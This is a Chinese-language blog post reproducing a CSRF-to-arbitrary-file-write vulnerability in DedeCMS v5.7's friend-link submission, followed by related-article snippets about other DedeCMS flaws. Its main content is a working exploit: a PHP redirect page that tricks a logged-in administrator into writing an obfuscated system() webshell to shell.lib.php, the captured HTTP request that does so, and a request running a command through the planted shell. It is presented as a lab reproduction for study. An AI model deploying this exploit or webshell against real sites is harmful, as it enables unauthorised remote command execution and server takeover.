DedeCMS_v5.7_友情链接CSRF+任意文件写入漏洞

最新推荐文章于 2024-08-04 22:42:40 发布
最新推荐文章于 2024-08-04 22:42:40 发布
阅读量2.7k 收藏 2
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/84588301
版权

参考:https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell
后台任意文件写入漏洞参考:
https://www.freebuf.com/vuls/164035.html
还有一个后台任意文件写入漏洞:
某CMS V5.7 SP2 后台Getshell也是需要管理员登录的,就不演示了。
略鸡肋,需要管理员点击。

步骤

先在网站最下面点击“申请加入”,然后填入构造的网站链接:

http://192.168.170.139:8888/dedecms_csrf.php

然后该链接需要服务器后台可以访问的地址即可。(这里演示可以用php -S 192.168.170.139:8888)启动一个web服务。
该链接的内容为:

<?php
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径
$muma = '<'.'p'.'h'.'p'.' '.'?'.'@'.'s'.'y'.'s'.'t'.'e'.'m'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'\''.'c'.'\''.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
header("location: ".$url);
exit();

登录的管理员点击这个链接
在这里插入图片描述
即可发出以下请求:

GET /dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?php+@system($_REQUEST[%27c%27]);?%3E&filename=shell.lib.php HTTP/1.1
Host: 192.168.170.139
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3590.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.170.139/dede/friendlink_main.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1%2C5_1; PHPSESSID=007f34e0c5cb0af798fc22cd2cc59442; _csrf_name_219dde03=0957cc447dd927bbc951a41988de261c; _csrf_name_219dde03__ckMd5=b038b83ef0fe4362; last_vtime=1543393996; last_vtime__ckMd5=60dff44dc846f210; last_vid=0000001; last_vid__ckMd5=a4e5f256daf9e616; DedeUserID=1; DedeUserID__ckMd5=3f11bf2d96ba0bad; DedeLoginTime=1543395060; DedeLoginTime__ckMd5=5ee3e2d97596dade; ENV_GOBACK_URL=%2Fdede%2Ffriendlink_main.php
Connection: close

发现成功生成两个webshell:
在这里插入图片描述
直接访问生成的webshell:

GET /include/taglib/shell.lib.php?c=ifconfig HTTP/1.1
Host: 192.168.170.139
Connection: close

在这里插入图片描述

caiqiiqi
关注
专栏目录
dedecms远程文件包含漏洞
weixin_43778463的博客
11-06 1079
dedecms远程文件包含漏洞
代码审计(PHP)-代码执行漏洞-DedeCMS V5.7 UTF8 SP2
iHuangZuGuang的博客
01-24 723
代码审计-代码执行漏洞-DedeCMS V5.7 UTF8 SP2 漏洞代码位于tpl.php251行-281行 此处定义savetagfile()函数:判断参数"action"是否等于savetagfile,若等于,进行下一步。 csrf_chack():csrf检验函数,需要加上token来进行绕过。token是登陆令牌,向服务器发送登录请求时,客户端会生成一个用于验证的令牌。 function csrf_check() { global $token; if(!isset($token
DedeCms 5.7友情链接模块注入漏洞
weixin_30457551的博客
12-13 322
漏洞版本: DedeCms 5.7 漏洞描述: DedeCms基于PHP+MySQL的技术开发,是目前国内应用最广泛的php类CMS系统。 DedeCms 5.7前台提交友情链接处,可以插入恶意JS代码。 <* 参考 http://0day5.com/archives/925http://sebug.net/appdir/织梦(DedeCms) *> ...
DeDeCMS-漏洞复现
最新发布
Jz031212的博客
08-04 269
2.上传后访问你上传的一句话木马文件 我这里写的一句话木马为phpinfo,显示成功即可证明注入。4.点击生成--更新主页html,将htm后缀改成php并且生成静态,点击更新主页html。5.访问此页面,没有报错证明注入成功(由于没有回显,这里输入的POST传参)1.点击核心--文件式管理器 点击文件上传,将我们的一句话木马进行上传。2.进入后点击模板--默认模板管理,找到index.htm。1.点击模板--广告管理--生成一个新广告。3.点击右方的编辑进入后改成写入的。5.给出一个更新后的路径。
阿里云关于 dedecms v5.7 CSRF保护措施绕过漏洞修复
weixin_41165585的博客
10-22 524
找到项目路径下的/dede/config.php文件的第70行附近的 ** csrf_check() **函数 function csrf_check() { global $token; if(!isset($token) || strcasecmp($token, $_SESSION['token']) != 0){ echo '<a href="htt...
dedecms友情链接plus/flink.php页面出错,DedeCMS友情链接flink_add Getshell漏洞管理员CSRF漏洞...
weixin_32581787的博客
03-21 548
DedeCMS友情链接漏洞,DedeCMS漏洞,1、漏洞利用由于tpl.php中的$action,$content,$filename变量没有初始化,从而能操纵这些变量写入任意的代码。又由于应用没有对管理员的来源页进行任何检查,只是检查了管理员是否登陆,从而造成了CSRF漏洞。因此可以诱导管理员以管理员的权限写入代码即可。测试版本:DedeCMS-V5.7-UTF8-SP1-Full 201506...
DedeCMS_v5.7漏洞复现
热门推荐
qq_51459600的博客
04-06 1万+
DedeCMS_v5.7漏洞复现 环境搭建: 服务器:WinServer2008(10.10.10.143) + phpstudy2018 DedeCMS版本:DedeCMS-V5.7-UTF8-SP2 下载地址:https://pan.baidu.com/s/1GQjWSDe7IlMVsVJ7HvrBOw 提取码: i4wk 0x01 URL重定向 版本<=5.7sp2 漏洞复现 payload: http://10.10.10.143/Dedecms/plus/download.php?open
xss+csrf+html练习源码.rar_XSS_csrf_csrf源码_xss源码_xss练习源码
09-20
这个“xss+csrf+html练习源码.rar”文件提供了针对这些漏洞的实战练习,帮助安全研究人员或开发者加深对这些威胁的理解和防御能力。 XSS攻击主要分为反射型、存储型和DOM型三种类型。反射型XSS发生在用户点击链接...
一个基于java开发的漏洞测试环境,其中包括了sql注入,csrf任意文件上传,越权等等.zip
03-24
这些漏洞包括SQL注入、CSRF(跨站请求伪造)、任意文件上传以及权限越权,这些都是网络安全领域中至关重要的知识点。 **SQL注入**是一种攻击手段,攻击者通过在输入数据中嵌入恶意的SQL语句,欺骗数据库执行非预期...
dedecms5.7最新漏洞修复
a1079540945的专栏
10-15 4190
文章来源:武汉八音猫科技有限公司
dedeCMS V5_7 SP2后台代码执行漏洞复现
qq_39922242的博客
10-27 1078
漏洞描述: DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,攻击者可利用该漏洞在增加新的标签中上传木马,获取webshell 安装dedecms. 打开已知存在漏洞的php页面 tpl.php 查看源码 1.定义了一个savetagfile的函数,判断参数”action”是否等于savetagfile,如果等于就进行下一步 2.csrf检验函数,需要加上token来绕过限制 3.正则表达式匹配,判断filename参数是否匹配正则表达式的条件,不匹配就不能进行修改操作。 4.$con
dedecms 5.7 download.php 代码执行漏洞,CMS-Hunter/DedeCMS/DedeCMS V5.7 SP2后台存在代码执行漏洞 at master · SecWiki/CM...
weixin_42203424的博客
04-02 152
Affected VersionDedeCMS V5.7 SP2Code analysis漏洞详情默认后台地址 /dede/,文件dede/tpl.php中的251到281行。csrf_check();#filename和前面正则的匹配情况if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename)){ShowMsg('文件名不合法,不允许进...
[漏洞复现]dedeCMS V5.7 SP2后台代码执行(CNVD-2018-01221)
Vicl1fe的博客
02-19 702
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/yuzly/p/11326571.html 源码网址: http://www.dedecms.com/products/dedecms/downloads/ 漏洞概述 需要以管理员权限登录后台。在tpl.php中savefile行为没有进行严格的过滤 ...
dedecmsv5.7sp1远程文件包含漏洞审计
weixin_30820151的博客
05-30 238
dedecms5.7 sp1版本存在远程文件包含漏洞,在此记录审计复现漏洞过程。 漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖以至于最后引起远程文件包含漏洞。 0x01 变量覆盖 看代码的18-39行 $insLockfile = dirname(__FILE__).'/install_lock.txt'; ...
远程文件包含漏洞dedecms5.7 sp1版本漏洞复现)
kid的博客
06-05 6049
远程文件包含漏洞dedecms5.7 sp1版本漏洞复现) 前言 前面看一个视频提到这个漏洞的复现,自己觉得这种漏洞复现然后分析原因还是蛮有意思的,所以这里也来实现一下这个漏洞的复现,自己动手还是很重要的一个过程吧 过程 首先是搭建环境,phpstudy + dedecms5.7 sp1基本是一键安装 漏洞原因主要是在install的index.php文件中 foreach(Array('_...
DedeCMS V5.7 SP2存在代码执行漏洞分析(CNVD-2018-01221)
wednesday的博客
07-15 578
该问题是一个由任意文件上传带来的代码执行漏洞,由于本身要求上传php结尾文件,再加上未对上传文件内容进行检查,所以导致了该漏洞漏洞产生在/dede/tpl.php,由此可见要利用该漏洞你得登录进后台。问题产生在代码251行开始。代码详解如下图 漏洞复现: 前提是你得通过其他方法进入到dede的后台,比如弱口令啥的。 然后由上述图片中csrf_check()函数会校验token,所以我们得先获取到token。 要怎么才能获取到token呢?我们再去tpl.php里看一下,发现ac
织梦友情链接html,总结dedecms怎么调用友情链接的方法[全]
weixin_29621655的博客
06-03 461
dedecms作为市面上常用的cms之一,也有不少朋友开发了dedecms标签生成器,但是在友情链接这一块却还有不少空白,下面老威总结了dedecms怎么调用友情链接的方法,各种方式都有!标记名称:flink[标签简介][功能说明]:用于获取友情链接,其对应后台文件为"includetaglibflink.lib.php".[适用范围]:全局标记,适用V55,V56,V57。[参数说明]:[1]t...
WEB漏洞挖掘:任意文件下载与SQL/CSRF实例分析
"《任意文件下载关键字-WEB常见漏洞与挖掘技巧研究》是一篇深入探讨Web安全领域的文章,作者吴建亮,以其在广东动易网络的身份分享了关于WEB常见漏洞及其案例的深入剖析。文章主要关注以下几个关键点: 1. 任意文件...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值